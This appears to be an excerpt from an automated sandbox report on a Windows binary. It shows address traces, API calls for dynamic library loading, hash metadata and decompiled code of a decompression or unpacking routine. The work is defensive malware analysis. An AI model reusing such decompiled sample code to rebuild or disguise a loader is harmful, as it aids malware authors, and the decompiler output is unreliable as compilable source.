                                                                                    0x73ca1cf0
                                                                                    0x73ca1cf0
                                                                                    0x00000000
                                                                                    0x73ca1cf0
                                                                                    0x73ca204d
                                                                                    0x73ca204f
                                                                                    0x73ca2055
                                                                                    0x73ca2055
                                                                                    0x73ca2057
                                                                                    0x73ca205a
                                                                                    0x73ca206d
                                                                                    0x73ca206d
                                                                                    0x73ca2070
                                                                                    0x73ca2073
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2075
                                                                                    0x73ca2078
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca207a
                                                                                    0x73ca2081
                                                                                    0x73ca2081
                                                                                    0x73ca2087
                                                                                    0x73ca208a
                                                                                    0x73ca20a6
                                                                                    0x73ca208c
                                                                                    0x73ca2095
                                                                                    0x73ca2098
                                                                                    0x73ca2098
                                                                                    0x00000000
                                                                                    0x73ca208a
                                                                                    0x73ca205c
                                                                                    0x73ca205f
                                                                                    0x73ca2062
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2064
                                                                                    0x00000000
                                                                                    0x73ca2064
                                                                                    0x73ca2051
                                                                                    0x73ca2053
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2053
                                                                                    0x73ca1c94
                                                                                    0x73ca1c94
                                                                                    0x73ca1c95
                                                                                    0x73ca1dde
                                                                                    0x73ca1dde
                                                                                    0x73ca1de5
                                                                                    0x73ca1de8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1df5
                                                                                    0x00000000
                                                                                    0x73ca1fdb
                                                                                    0x73ca1fde
                                                                                    0x73ca1fe1
                                                                                    0x73ca1fe1
                                                                                    0x73ca1fe2
                                                                                    0x73ca1fe5
                                                                                    0x73ca1fe7
                                                                                    0x73ca1fe9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1feb
                                                                                    0x73ca1feb
                                                                                    0x73ca1fee
                                                                                    0x73ca2000
                                                                                    0x73ca2003
                                                                                    0x73ca2006
                                                                                    0x73ca200c
                                                                                    0x00000000
                                                                                    0x73ca200c
                                                                                    0x73ca1ff0
                                                                                    0x73ca1ff0
                                                                                    0x73ca1ff2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1ff4
                                                                                    0x73ca1ff6
                                                                                    0x73ca1ff8
                                                                                    0x73ca1ff8
                                                                                    0x73ca1ff8
                                                                                    0x73ca1ff9
                                                                                    0x73ca1ffb
                                                                                    0x73ca1ffd
                                                                                    0x73ca1fe1
                                                                                    0x73ca1fe2
                                                                                    0x73ca1fe5
                                                                                    0x73ca1fe7
                                                                                    0x73ca1fe9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1fe9
                                                                                    0x00000000
                                                                                    0x73ca1e3c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1e48
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1e2f
                                                                                    0x73ca1e33
                                                                                    0x73ca1e37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1fad
                                                                                    0x73ca1fb1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1fb7
                                                                                    0x73ca1fbf
                                                                                    0x73ca1fc6
                                                                                    0x73ca1fce
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f15
                                                                                    0x73ca1f15
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1e51
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca202b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f1d
                                                                                    0x73ca1f1f
                                                                                    0x73ca1f1f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca201b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca201f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2027
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f64
                                                                                    0x73ca1f66
                                                                                    0x73ca1f66
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f2f
                                                                                    0x73ca1f31
                                                                                    0x73ca1f31
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f41
                                                                                    0x73ca1f43
                                                                                    0x73ca1f43
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f72
                                                                                    0x73ca1f74
                                                                                    0x73ca1f74
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f4c
                                                                                    0x73ca1f4e
                                                                                    0x73ca1f4e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2023
                                                                                    0x73ca202d
                                                                                    0x73ca202d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f7d
                                                                                    0x73ca1f81
                                                                                    0x73ca1f86
                                                                                    0x73ca1f89
                                                                                    0x73ca1f8a
                                                                                    0x73ca1f8d
                                                                                    0x73ca1f93
                                                                                    0x73ca1f93
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2013
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f57
                                                                                    0x73ca1f57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1e58
                                                                                    0x73ca1e58
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f6b
                                                                                    0x73ca1f6d
                                                                                    0x73ca1f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1dfc
                                                                                    0x73ca1e02
                                                                                    0x73ca1e05
                                                                                    0x73ca1e07
                                                                                    0x73ca1e07
                                                                                    0x73ca1e0a
                                                                                    0x73ca1e0e
                                                                                    0x73ca1e1b
                                                                                    0x73ca1e1d
                                                                                    0x73ca1e23
                                                                                    0x73ca1e23
                                                                                    0x73ca1e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f20
                                                                                    0x73ca1f20
                                                                                    0x73ca1f22
                                                                                    0x73ca1f29
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f67
                                                                                    0x73ca1f67
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f32
                                                                                    0x73ca1f32
                                                                                    0x73ca1f34
                                                                                    0x73ca1f3b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f44
                                                                                    0x73ca1f44
                                                                                    0x73ca1f46
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f75
                                                                                    0x73ca1f75
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f4f
                                                                                    0x73ca1f4f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f9b
                                                                                    0x73ca1f9f
                                                                                    0x73ca1fa4
                                                                                    0x73ca1fa7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f59
                                                                                    0x73ca1f59
                                                                                    0x73ca1f5c
                                                                                    0x73ca1f5e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1f6e
                                                                                    0x73ca1f6e
                                                                                    0x73ca1f77
                                                                                    0x73ca1f77
                                                                                    0x73ca1e5a
                                                                                    0x73ca1e5a
                                                                                    0x73ca1e5d
                                                                                    0x73ca1e64
                                                                                    0x73ca1e66
                                                                                    0x73ca1e68
                                                                                    0x73ca1e6f
                                                                                    0x73ca1e72
                                                                                    0x73ca1e77
                                                                                    0x73ca1e79
                                                                                    0x73ca1e7b
                                                                                    0x73ca1e7f
                                                                                    0x73ca1e85
                                                                                    0x73ca1e8b
                                                                                    0x73ca1e8b
                                                                                    0x73ca1e8d
                                                                                    0x73ca1e8d
                                                                                    0x73ca1e8e
                                                                                    0x73ca1e8e
                                                                                    0x73ca1e92
                                                                                    0x73ca1e98
                                                                                    0x73ca1e9a
                                                                                    0x73ca1e9e
                                                                                    0x73ca1ea3
                                                                                    0x73ca1ea3
                                                                                    0x73ca1ea5
                                                                                    0x73ca1ea5
                                                                                    0x73ca1ea8
                                                                                    0x73ca1eab
                                                                                    0x73ca1eb4
                                                                                    0x73ca1eb7
                                                                                    0x73ca1eba
                                                                                    0x73ca1eba
                                                                                    0x73ca1ebc
                                                                                    0x73ca1ebf
                                                                                    0x73ca1ec5
                                                                                    0x73ca1ecb
                                                                                    0x73ca1ecb
                                                                                    0x73ca1ecd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1ed3
                                                                                    0x73ca1ed3
                                                                                    0x73ca1ed7
                                                                                    0x73ca1ede
                                                                                    0x73ca1f02
                                                                                    0x73ca1f02
                                                                                    0x73ca1f06
                                                                                    0x73ca1f08
                                                                                    0x73ca1f0b
                                                                                    0x73ca1f0b
                                                                                    0x73ca1f0e
                                                                                    0x73ca1f0e
                                                                                    0x00000000
                                                                                    0x73ca1f06
                                                                                    0x73ca1ee3
                                                                                    0x73ca1ee6
                                                                                    0x73ca1ee6
                                                                                    0x73ca1eed
                                                                                    0x73ca1eef
                                                                                    0x73ca1ef2
                                                                                    0x73ca1ef9
                                                                                    0x73ca1efa
                                                                                    0x73ca1f00
                                                                                    0x73ca1f00
                                                                                    0x00000000
                                                                                    0x73ca1f00
                                                                                    0x73ca1ef4
                                                                                    0x73ca1ef7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1ef7
                                                                                    0x73ca1e87
                                                                                    0x73ca1e89
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1df5
                                                                                    0x73ca1c9b
                                                                                    0x73ca1c9b
                                                                                    0x73ca1c9c
                                                                                    0x73ca1ddb
                                                                                    0x00000000
                                                                                    0x73ca1ddb
                                                                                    0x73ca1ca2
                                                                                    0x73ca1ca3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1ca9
                                                                                    0x73ca1cac
                                                                                    0x73ca1da0
                                                                                    0x73ca1da0
                                                                                    0x73ca1da3
                                                                                    0x73ca1db8
                                                                                    0x73ca1dba
                                                                                    0x73ca1dba
                                                                                    0x73ca1dbb
                                                                                    0x73ca1dbe
                                                                                    0x73ca1dc1
                                                                                    0x73ca1dcd
                                                                                    0x73ca1dcd
                                                                                    0x73ca1dcd
                                                                                    0x73ca1dc3
                                                                                    0x73ca1dc3
                                                                                    0x73ca1dc3
                                                                                    0x73ca1dd3
                                                                                    0x00000000
                                                                                    0x73ca1dd3
                                                                                    0x73ca1da5
                                                                                    0x73ca1da5
                                                                                    0x73ca1da6
                                                                                    0x73ca1db4
                                                                                    0x00000000
                                                                                    0x73ca1db4
                                                                                    0x73ca1da9
                                                                                    0x73ca1daa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1db0
                                                                                    0x00000000
                                                                                    0x73ca1db0
                                                                                    0x73ca1cb2
                                                                                    0x73ca1d9c
                                                                                    0x00000000
                                                                                    0x73ca1d9c
                                                                                    0x73ca1cb8
                                                                                    0x73ca1cb8
                                                                                    0x73ca1cbb
                                                                                    0x73ca1ce4
                                                                                    0x00000000
                                                                                    0x73ca1ce4
                                                                                    0x73ca1cbd
                                                                                    0x73ca1cbd
                                                                                    0x73ca1cc0
                                                                                    0x73ca1cda
                                                                                    0x00000000
                                                                                    0x73ca1cda
                                                                                    0x73ca1cc2
                                                                                    0x73ca1cc2
                                                                                    0x73ca1cc5
                                                                                    0x73ca1cd4
                                                                                    0x00000000
                                                                                    0x73ca1cd4
                                                                                    0x73ca1cc8
                                                                                    0x73ca1cc9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1ccb
                                                                                    0x00000000
                                                                                    0x73ca1b83
                                                                                    0x73ca1b83
                                                                                    0x73ca1b86
                                                                                    0x00000000
                                                                                    0x73ca1b86
                                                                                    0x73ca1b7d
                                                                                    0x73ca1b6b
                                                                                    0x73ca1b6f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1b71
                                                                                    0x73ca1b74
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1b74
                                                                                    0x73ca1b05
                                                                                    0x73ca1b08
                                                                                    0x73ca1b3e
                                                                                    0x73ca1b41
                                                                                    0x00000000
                                                                                    0x73ca1b47
                                                                                    0x73ca1b49
                                                                                    0x73ca1b4d
                                                                                    0x73ca1b54
                                                                                    0x73ca1b5b
                                                                                    0x73ca1b5e
                                                                                    0x73ca1b61
                                                                                    0x00000000
                                                                                    0x73ca1b61
                                                                                    0x73ca1b41
                                                                                    0x73ca1b0a
                                                                                    0x73ca1b0b
                                                                                    0x73ca1b26
                                                                                    0x73ca1b29
                                                                                    0x00000000
                                                                                    0x73ca1b2f
                                                                                    0x73ca1b2f
                                                                                    0x73ca1b36
                                                                                    0x73ca1b39
                                                                                    0x00000000
                                                                                    0x73ca1b39
                                                                                    0x73ca1b29
                                                                                    0x73ca1b10
                                                                                    0x00000000
                                                                                    0x73ca1b16
                                                                                    0x73ca1b16
                                                                                    0x73ca1b1d
                                                                                    0x00000000
                                                                                    0x73ca1b1d
                                                                                    0x73ca1b10
                                                                                    0x73ca1d09
                                                                                    0x73ca1d0e
                                                                                    0x73ca1d13
                                                                                    0x73ca1d17
                                                                                    0x73ca21c6
                                                                                    0x73ca21cc
                                                                                    0x73ca1d29
                                                                                    0x73ca1d2b
                                                                                    0x73ca1d2c
                                                                                    0x73ca20f1
                                                                                    0x73ca20f1
                                                                                    0x73ca20f4
                                                                                    0x73ca20f7
                                                                                    0x73ca2114
                                                                                    0x73ca211a
                                                                                    0x73ca211c
                                                                                    0x73ca2122
                                                                                    0x73ca2139
                                                                                    0x73ca2139
                                                                                    0x73ca2139
                                                                                    0x73ca2146
                                                                                    0x73ca214c
                                                                                    0x73ca214f
                                                                                    0x73ca2155
                                                                                    0x73ca2157
                                                                                    0x73ca215a
                                                                                    0x73ca215c
                                                                                    0x73ca2163
                                                                                    0x73ca2168
                                                                                    0x73ca216b
                                                                                    0x73ca216d
                                                                                    0x73ca2172
                                                                                    0x73ca2184
                                                                                    0x73ca2184
                                                                                    0x73ca2172
                                                                                    0x73ca216b
                                                                                    0x73ca215a
                                                                                    0x73ca218a
                                                                                    0x73ca218d
                                                                                    0x73ca2197
                                                                                    0x73ca219f
                                                                                    0x73ca21ab
                                                                                    0x73ca21b1
                                                                                    0x73ca21b4
                                                                                    0x73ca20e6
                                                                                    0x73ca20e6
                                                                                    0x00000000
                                                                                    0x73ca20e6
                                                                                    0x73ca21ba
                                                                                    0x73ca21c0
                                                                                    0x73ca21c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca21c2
                                                                                    0x73ca21c2
                                                                                    0x73ca21c2
                                                                                    0x73ca21c2
                                                                                    0x00000000
                                                                                    0x73ca218f
                                                                                    0x73ca218f
                                                                                    0x73ca2195
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2195
                                                                                    0x73ca218d
                                                                                    0x73ca2125
                                                                                    0x73ca212b
                                                                                    0x73ca212d
                                                                                    0x73ca2133
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca2133
                                                                                    0x73ca20f9
                                                                                    0x73ca2100
                                                                                    0x73ca2106
                                                                                    0x73ca210c
                                                                                    0x00000000
                                                                                    0x73ca210c
                                                                                    0x73ca1d32
                                                                                    0x73ca1d33
                                                                                    0x73ca20d0
                                                                                    0x73ca20d0
                                                                                    0x73ca20d6
                                                                                    0x73ca20d9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca20e0
                                                                                    0x73ca20e5
                                                                                    0x00000000
                                                                                    0x73ca20e5
                                                                                    0x73ca1d3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1d40
                                                                                    0x73ca1d40
                                                                                    0x73ca1d49
                                                                                    0x73ca1d4e
                                                                                    0x73ca1d54
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1d5a
                                                                                    0x73ca1d67
                                                                                    0x73ca1d6d
                                                                                    0x73ca1d77
                                                                                    0x73ca1d7d
                                                                                    0x73ca1d85
                                                                                    0x73ca1d95
                                                                                    0x00000000
                                                                                    0x73ca1d95

                                                                                    APIs
                                                                                      • Part of subcall function 73CA1215: GlobalAlloc.KERNEL32(00000040,73CA1233,?,73CA12CF,-73CA404B,73CA11AB,-000000A0), ref: 73CA121D
                                                                                    • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73CA1BC4
                                                                                    • lstrcpyA.KERNEL32(00000008,?), ref: 73CA1C0C
                                                                                    • lstrcpyA.KERNEL32(00000408,?), ref: 73CA1C16
                                                                                    • GlobalFree.KERNEL32 ref: 73CA1C29
                                                                                    • GlobalFree.KERNEL32 ref: 73CA1D09
                                                                                    • GlobalFree.KERNEL32 ref: 73CA1D0E
                                                                                    • GlobalFree.KERNEL32 ref: 73CA1D13
                                                                                    • GlobalFree.KERNEL32 ref: 73CA1EFA
                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 73CA2098
                                                                                    • GetModuleHandleA.KERNEL32(00000008), ref: 73CA2114
                                                                                    • LoadLibraryA.KERNEL32(00000008), ref: 73CA2125
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 73CA217E
                                                                                    • lstrlenA.KERNEL32(00000408), ref: 73CA2198
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 245916457-0
                                                                                    • Opcode ID: cc50f2ee78442a5c956f4ebe4aaeaff6ddb13c32555c3248f12cd16cc412ac3a
                                                                                    • Instruction ID: 2aaa18b09e9434af74f677818533cb76de0729d85d8fad935e25becd6d34315c
                                                                                    • Opcode Fuzzy Hash: cc50f2ee78442a5c956f4ebe4aaeaff6ddb13c32555c3248f12cd16cc412ac3a
                                                                                    • Instruction Fuzzy Hash: 2822B971D0425B9FDB12CFADC9847ADBBF5FB04304F25852ED196EA280DB749A81CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
